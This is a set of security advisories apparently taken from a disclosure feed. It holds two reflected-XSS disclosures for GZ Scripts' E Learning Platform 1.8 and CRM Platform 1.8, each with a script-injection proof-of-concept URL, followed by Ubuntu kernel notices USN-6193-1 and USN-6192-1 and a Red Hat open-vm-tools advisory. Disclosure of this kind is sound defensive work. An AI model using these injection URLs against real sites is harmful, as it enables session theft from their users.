GZ E Learning Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-e-learning-platform.html                          ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ E Learning Platform 1.8                                                 ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/index.php/sxiqd"><script>alert(1)</script>ilec2?controller=GzUser&action=edit&id=5[-] Done

GZ E Learning Platform 1.8 Cross Site Scripting

Ubuntu Security Notice 6193-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that for some Intel processors the INVLPG instruction implementation did not properly flush global TLB entries when PCIDs are enabled. An attacker could use this to expose sensitive information or possibly cause undesired behaviors.

    ==========================================================================Ubuntu Security Notice USN-6193-1June 29, 2023linux, linux-aws, linux-aws-5.15, linux-aws-5.4, linux-azure,linux-azure-5.15, linux-azure-5.4, linux-azure-fde-5.15, linux-bluefield,linux-gcp, linux-gcp-5.15, linux-gcp-5.4, linux-gke, linux-gke-5.15,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-hwe-5.4, linux-ibm,linux-ibm-5.4, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15,linux-nvidia, linux-oracle, linux-oracle-5.15, linux-oracle-5.4,linux-raspi, linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-raspi: Linux kernel for Raspberry Pi systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systems- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code.  (CVE-2023-35788, LP: #2023577)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   linux-image-6.2.0-1006-aws      6.2.0-1006.6   linux-image-6.2.0-1007-kvm      6.2.0-1007.7   linux-image-6.2.0-1007-lowlatency  6.2.0-1007.7   linux-image-6.2.0-1007-lowlatency-64k  6.2.0-1007.7   linux-image-6.2.0-1007-raspi    6.2.0-1007.9   linux-image-6.2.0-1007-raspi-nolpae  6.2.0-1007.9   linux-image-6.2.0-24-generic    6.2.0-24.24   linux-image-6.2.0-24-generic-64k  6.2.0-24.24   linux-image-6.2.0-24-generic-lpae  6.2.0-24.24   linux-image-aws                 6.2.0.1006.7   linux-image-generic             6.2.0.24.24   linux-image-generic-64k         6.2.0.24.24   linux-image-generic-lpae        6.2.0.24.24   linux-image-kvm                 6.2.0.1007.7   linux-image-lowlatency          6.2.0.1007.7   linux-image-lowlatency-64k      6.2.0.1007.7   linux-image-raspi               6.2.0.1007.10   linux-image-raspi-nolpae        6.2.0.1007.10   linux-image-virtual             6.2.0.24.24Ubuntu 22.04 LTS:   linux-image-5.15.0-1023-gkeop   5.15.0-1023.28   linux-image-5.15.0-1028-nvidia  5.15.0-1028.28   linux-image-5.15.0-1028-nvidia-lowlatency  5.15.0-1028.28   linux-image-5.15.0-1033-ibm     5.15.0-1033.36   linux-image-5.15.0-1033-raspi   5.15.0-1033.36   linux-image-5.15.0-1033-raspi-nolpae  5.15.0-1033.36   linux-image-5.15.0-1037-gcp     5.15.0-1037.45   linux-image-5.15.0-1037-gke     5.15.0-1037.42   linux-image-5.15.0-1037-kvm     5.15.0-1037.42   linux-image-5.15.0-1038-oracle  5.15.0-1038.44   linux-image-5.15.0-1039-aws     5.15.0-1039.44   linux-image-5.15.0-1041-azure   5.15.0-1041.48   linux-image-5.15.0-76-generic   5.15.0-76.83   linux-image-5.15.0-76-generic-64k  5.15.0-76.83   linux-image-5.15.0-76-generic-lpae  5.15.0-76.83   linux-image-5.15.0-76-lowlatency  5.15.0-76.83   linux-image-5.15.0-76-lowlatency-64k  5.15.0-76.83   linux-image-aws-lts-22.04       5.15.0.1039.38   linux-image-azure               5.15.0.1041.37   linux-image-azure-lts-22.04     5.15.0.1041.37   linux-image-gcp-lts-22.04       5.15.0.1037.33   linux-image-generic             5.15.0.76.74   linux-image-generic-64k         5.15.0.76.74   linux-image-generic-lpae        5.15.0.76.74   linux-image-gke                 5.15.0.1037.36   linux-image-gke-5.15            5.15.0.1037.36   linux-image-gkeop               5.15.0.1023.22   linux-image-gkeop-5.15          5.15.0.1023.22   linux-image-ibm                 5.15.0.1033.29   linux-image-kvm                 5.15.0.1037.33   linux-image-lowlatency          5.15.0.76.81   linux-image-lowlatency-64k      5.15.0.76.81   linux-image-nvidia              5.15.0.1028.28   linux-image-nvidia-lowlatency   5.15.0.1028.28   linux-image-oracle              5.15.0.1038.33   linux-image-raspi               5.15.0.1033.30   linux-image-raspi-nolpae        5.15.0.1033.30   linux-image-virtual             5.15.0.76.74Ubuntu 20.04 LTS:   linux-image-5.15.0-1023-gkeop   5.15.0-1023.28~20.04.1   linux-image-5.15.0-1037-gcp     5.15.0-1037.45~20.04.1   linux-image-5.15.0-1037-gke     5.15.0-1037.42~20.04.1   linux-image-5.15.0-1038-oracle  5.15.0-1038.44~20.04.1   linux-image-5.15.0-1039-aws     5.15.0-1039.44~20.04.1   linux-image-5.15.0-1041-azure   5.15.0-1041.48~20.04.1   linux-image-5.15.0-1041-azure-fde  5.15.0-1041.48~20.04.1.1   linux-image-5.15.0-76-generic   5.15.0-76.83~20.04.1   linux-image-5.15.0-76-generic-64k  5.15.0-76.83~20.04.1   linux-image-5.15.0-76-generic-lpae  5.15.0-76.83~20.04.1   linux-image-5.15.0-76-lowlatency  5.15.0-76.83~20.04.1   linux-image-5.15.0-76-lowlatency-64k  5.15.0-76.83~20.04.1   linux-image-5.4.0-1052-ibm      5.4.0-1052.57   linux-image-5.4.0-1066-bluefield  5.4.0-1066.72   linux-image-5.4.0-1072-gkeop    5.4.0-1072.76   linux-image-5.4.0-1089-raspi    5.4.0-1089.100   linux-image-5.4.0-1094-kvm      5.4.0-1094.100   linux-image-5.4.0-1104-oracle   5.4.0-1104.113   linux-image-5.4.0-1105-aws      5.4.0-1105.113   linux-image-5.4.0-1108-gcp      5.4.0-1108.117   linux-image-5.4.0-1111-azure    5.4.0-1111.117   linux-image-5.4.0-153-generic   5.4.0-153.170   linux-image-5.4.0-153-generic-lpae  5.4.0-153.170   linux-image-5.4.0-153-lowlatency  5.4.0-153.170   linux-image-aws                 5.15.0.1039.44~20.04.28   linux-image-aws-lts-20.04       5.4.0.1105.102   linux-image-azure               5.15.0.1041.48~20.04.31   linux-image-azure-cvm           5.15.0.1041.48~20.04.31   linux-image-azure-fde           5.15.0.1041.48~20.04.1.20   linux-image-azure-lts-20.04     5.4.0.1111.104   linux-image-bluefield           5.4.0.1066.61   linux-image-gcp                 5.15.0.1037.45~20.04.1   linux-image-gcp-lts-20.04       5.4.0.1108.110   linux-image-generic             5.4.0.153.150   linux-image-generic-64k-hwe-20.04  5.15.0.76.83~20.04.37   linux-image-generic-hwe-20.04   5.15.0.76.83~20.04.37   linux-image-generic-lpae        5.4.0.153.150   linux-image-generic-lpae-hwe-20.04  5.15.0.76.83~20.04.37   linux-image-gke-5.15            5.15.0.1037.42~20.04.1   linux-image-gkeop               5.4.0.1072.70   linux-image-gkeop-5.15          5.15.0.1023.28~20.04.19   linux-image-gkeop-5.4           5.4.0.1072.70   linux-image-ibm                 5.4.0.1052.78   linux-image-ibm-lts-20.04       5.4.0.1052.78   linux-image-kvm                 5.4.0.1094.89   linux-image-lowlatency          5.4.0.153.150   linux-image-lowlatency-64k-hwe-20.04  5.15.0.76.83~20.04.34   linux-image-lowlatency-hwe-20.04  5.15.0.76.83~20.04.34   linux-image-oem                 5.4.0.153.150   linux-image-oem-20.04           5.15.0.76.83~20.04.37   linux-image-oem-20.04b          5.15.0.76.83~20.04.37   linux-image-oem-20.04c          5.15.0.76.83~20.04.37   linux-image-oem-20.04d          5.15.0.76.83~20.04.37   linux-image-oem-osp1            5.4.0.153.150   linux-image-oracle              5.15.0.1038.44~20.04.1   linux-image-oracle-lts-20.04    5.4.0.1104.97   linux-image-raspi               5.4.0.1089.119   linux-image-raspi-hwe-18.04     5.4.0.1089.119   linux-image-raspi2              5.4.0.1089.119   linux-image-raspi2-hwe-18.04    5.4.0.1089.119   linux-image-virtual             5.4.0.153.150   linux-image-virtual-hwe-20.04   5.15.0.76.83~20.04.37Ubuntu 18.04 LTS (Available with Ubuntu Pro):   linux-image-5.4.0-1052-ibm      5.4.0-1052.57~18.04.1   linux-image-5.4.0-1089-raspi    5.4.0-1089.100~18.04.1   linux-image-5.4.0-1104-oracle   5.4.0-1104.113~18.04.1   linux-image-5.4.0-1105-aws      5.4.0-1105.113~18.04.1   linux-image-5.4.0-1108-gcp      5.4.0-1108.117~18.04.1   linux-image-5.4.0-1111-azure    5.4.0-1111.117~18.04.1   linux-image-5.4.0-153-generic   5.4.0-153.170~18.04.1   linux-image-5.4.0-153-generic-lpae  5.4.0-153.170~18.04.1   linux-image-5.4.0-153-lowlatency  5.4.0-153.170~18.04.1   linux-image-aws                 5.4.0.1105.83   linux-image-azure               5.4.0.1111.84   linux-image-gcp                 5.4.0.1108.84   linux-image-generic-hwe-18.04   5.4.0.153.170~18.04.124   linux-image-generic-lpae-hwe-18.04  5.4.0.153.170~18.04.124   linux-image-ibm                 5.4.0.1052.63   linux-image-lowlatency-hwe-18.04  5.4.0.153.170~18.04.124   linux-image-oem                 5.4.0.153.170~18.04.124   linux-image-oem-osp1            5.4.0.153.170~18.04.124   linux-image-oracle              5.4.0.1104.113~18.04.76   linux-image-raspi-hwe-18.04     5.4.0.1089.86   linux-image-snapdragon-hwe-18.04  5.4.0.153.170~18.04.124   linux-image-virtual-hwe-18.04   5.4.0.153.170~18.04.124After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6193-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux/6.2.0-24.24   https://launchpad.net/ubuntu/+source/linux-aws/6.2.0-1006.6   https://launchpad.net/ubuntu/+source/linux-kvm/6.2.0-1007.7   https://launchpad.net/ubuntu/+source/linux-lowlatency/6.2.0-1007.7   https://launchpad.net/ubuntu/+source/linux-raspi/6.2.0-1007.9   https://launchpad.net/ubuntu/+source/linux/5.15.0-76.83   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1039.44   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1041.48   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1037.45   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1037.42   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1023.28   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1033.36   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1037.42   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-76.83   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1028.28   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1038.44   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1033.36   https://launchpad.net/ubuntu/+source/linux/5.4.0-153.170   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1105.113   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1039.44~20.04.1   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1111.117   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1041.48~20.04.1 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1041.48~20.04.1.1   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1066.72   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1108.117   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1037.45~20.04.1   https://launchpad.net/ubuntu/+source/linux-gke-5.15/5.15.0-1037.42~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1072.76   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1023.28~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-76.83~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1052.57   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1094.100 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-76.83~20.04.1   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1104.113 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1038.44~20.04.1   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1089.100

Ubuntu Security Notice USN-6193-1

CRM Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-crm-platform.html                                ││  Vendor   : GZ Scripts                                                                 ││  Software : CRM Platform 1.8                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'action' parameter is vulnerable to RXSShttps://website/index.php?controller=GzAdmin&action=dashboardpsrfg%3cscript%3ealert(1)%3c%2fscript%3ea4o1z&err=2[-] Done

CRM Platform 1.8 Cross Site Scripting

Ubuntu Security Notice 6192-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in the Linux kernel did not properly handle locking when IOPOLL mode is being used. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6192-1June 29, 2023linux, linux-allwinner, linux-allwinner-5.19, linux-aws, linux-aws-5.19,linux-azure, linux-gcp, linux-gcp-5.19, linux-hwe-5.19, linux-ibm,linux-kvm, linux-lowlatency, linux-oracle, linux-raspi, linux-starfive,linux-starfive-5.19 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-allwinner: Linux kernel for Allwinner processors- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-starfive: Linux kernel for StarFive processors- linux-allwinner-5.19: Linux kernel for Allwinner processors- linux-aws-5.19: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.19: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.19: Linux hardware enablement (HWE) kernel- linux-starfive-5.19: Linux kernel for StarFive processorsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-35788, LP: #2023577)Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in theLinux kernel did not properly handle locking when IOPOLL mode is beingused. A local attacker could use this to cause a denial of service (systemcrash). (CVE-2023-2430)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   linux-image-5.19.0-1015-allwinner  5.19.0-1015.15   linux-image-5.19.0-1020-starfive  5.19.0-1020.22   linux-image-5.19.0-1022-raspi   5.19.0-1022.29   linux-image-5.19.0-1022-raspi-nolpae  5.19.0-1022.29   linux-image-5.19.0-1025-ibm     5.19.0-1025.27   linux-image-5.19.0-1026-kvm     5.19.0-1026.27   linux-image-5.19.0-1026-oracle  5.19.0-1026.29   linux-image-5.19.0-1027-gcp     5.19.0-1027.29   linux-image-5.19.0-1028-aws     5.19.0-1028.29   linux-image-5.19.0-1028-lowlatency  5.19.0-1028.29   linux-image-5.19.0-1028-lowlatency-64k  5.19.0-1028.29   linux-image-5.19.0-1029-azure   5.19.0-1029.32   linux-image-5.19.0-46-generic   5.19.0-46.47   linux-image-5.19.0-46-generic-64k  5.19.0-46.47   linux-image-5.19.0-46-generic-lpae  5.19.0-46.47   linux-image-allwinner           5.19.0.1015.15   linux-image-aws                 5.19.0.1028.25   linux-image-azure               5.19.0.1029.24   linux-image-gcp                 5.19.0.1027.23   linux-image-generic             5.19.0.46.42   linux-image-generic-64k         5.19.0.46.42   linux-image-generic-lpae        5.19.0.46.42   linux-image-ibm                 5.19.0.1025.22   linux-image-kvm                 5.19.0.1026.23   linux-image-lowlatency          5.19.0.1028.24   linux-image-lowlatency-64k      5.19.0.1028.24   linux-image-oracle              5.19.0.1026.22   linux-image-raspi               5.19.0.1022.21   linux-image-raspi-nolpae        5.19.0.1022.21   linux-image-starfive            5.19.0.1020.18   linux-image-virtual             5.19.0.46.42Ubuntu 22.04 LTS:   linux-image-5.19.0-1015-allwinner  5.19.0-1015.15~22.04.1   linux-image-5.19.0-1020-starfive  5.19.0-1020.22~22.04.1   linux-image-5.19.0-1027-gcp     5.19.0-1027.29~22.04.1   linux-image-5.19.0-1028-aws     5.19.0-1028.29~22.04.1   linux-image-5.19.0-46-generic   5.19.0-46.47~22.04.1   linux-image-5.19.0-46-generic-64k  5.19.0-46.47~22.04.1   linux-image-5.19.0-46-generic-lpae  5.19.0-46.47~22.04.1   linux-image-allwinner           5.19.0.1015.15~22.04.8   linux-image-aws                 5.19.0.1028.29~22.04.12   linux-image-gcp                 5.19.0.1027.29~22.04.1   linux-image-generic-64k-hwe-22.04  5.19.0.46.47~22.04.21   linux-image-generic-hwe-22.04   5.19.0.46.47~22.04.21   linux-image-generic-lpae-hwe-22.04  5.19.0.46.47~22.04.21   linux-image-starfive            5.19.0.1020.22~22.04.7   linux-image-virtual-hwe-22.04   5.19.0.46.47~22.04.21After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6192-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-2430, CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux/5.19.0-46.47   https://launchpad.net/ubuntu/+source/linux-allwinner/5.19.0-1015.15   https://launchpad.net/ubuntu/+source/linux-aws/5.19.0-1028.29   https://launchpad.net/ubuntu/+source/linux-azure/5.19.0-1029.32   https://launchpad.net/ubuntu/+source/linux-gcp/5.19.0-1027.29   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1025.27   https://launchpad.net/ubuntu/+source/linux-kvm/5.19.0-1026.27   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.19.0-1028.29   https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1026.29   https://launchpad.net/ubuntu/+source/linux-raspi/5.19.0-1022.29   https://launchpad.net/ubuntu/+source/linux-starfive/5.19.0-1020.22 https://launchpad.net/ubuntu/+source/linux-allwinner-5.19/5.19.0-1015.15~22.04.1   https://launchpad.net/ubuntu/+source/linux-aws-5.19/5.19.0-1028.29~22.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.19/5.19.0-1027.29~22.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.19/5.19.0-46.47~22.04.1 https://launchpad.net/ubuntu/+source/linux-starfive-5.19/5.19.0-1020.22~22.04.1

Ubuntu Security Notice USN-6192-1

Red Hat Security Advisory 2023-3947-01 - The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: open-vm-tools security update  
Advisory ID:       RHSA-2023:3947-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3947  
Issue date:        2023-06-29  
CVE Names:         CVE-2023-20867   
=====================================================================

1. Summary:

An update for open-vm-tools is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, x86_64

3. Description:

The Open Virtual Machine Tools are the open source implementation of the  
VMware Tools. They are a set of guest operating system virtualization  
components that enhance performance and user experience of virtual  
machines.

Security Fix(es):

* open-vm-tools: authentication bypass vulnerability in the vgauth module  
(CVE-2023-20867)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2213087 - CVE-2023-20867 open-vm-tools: authentication bypass vulnerability in the vgauth module

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
open-vm-tools-11.3.5-1.el9_0.2.src.rpm

aarch64:  
open-vm-tools-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-debugsource-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-desktop-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-desktop-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-sdmp-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-test-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-test-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm

x86_64:  
open-vm-tools-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-debugsource-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-desktop-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-desktop-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-sdmp-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-test-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-test-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20867  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ2ouNzjgjWX9erEAQghZQ/9Enod3YxV3Ne7U1wqlomGOeq04E/vg5ij  
IrU4FjnXj+w1hAu3BpZp7dTHaDLaiT3st3qQv7CmejEQN3wPnvJn1E/dJ3h7wdLC  
RqO7Q4WGjGJF7ISnX9rA7c1dCETIuqpEnp7IsX4Bcwu5NZ3+rgRuwoA8V1rb4loq  
fuFt+6aKzcRmnVw6rFqeIjhPIVgW3mFrADPnc7dKg+9d7yRR6IWPw82z9irlCeVT  
KROY25Mvo1tw1cYmmd6jyAuDhNMOmy7Q15ra0irW1yFidFpP0h3opDT6X3veqT0G  
8NkaXdiYYTSwqiOrDZbHLa9uOIl/wvl+xTal7YPCb+csPbGO8/K6upzKxTa/xjsm  
uQfJdq8nDE+4pgeGHSxSDgFtjyHDSEEFgWCD48fJSnlc2ejX2cC7sboTUs/ogNAh  
9L3E9wIKB3VKQ4Ij1OkRbasJOz9fgbMdrHabqLsk8nfwRHWKYG9Imr2PpXGZ1oqs  
8Mw10pdBK57da2jYYuDXlV/gdcEwFYamDhgTLEkRPSMUGhOn5dCmo+CMGxu901zr  
PmpOSr5FX8exF3TmslMZ4Dm56hzEy0FDLCallcFKt8Lx/lQbwXqOZOExK4cBa15H  
k12WYkr8kX/gkb+vEb+ppKLfEWpCZ2n4iVoK/taH+3UuzAeU0puReGscko7N3Ctq  
JSi0G604Vn8=  
=IwtM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3947-01

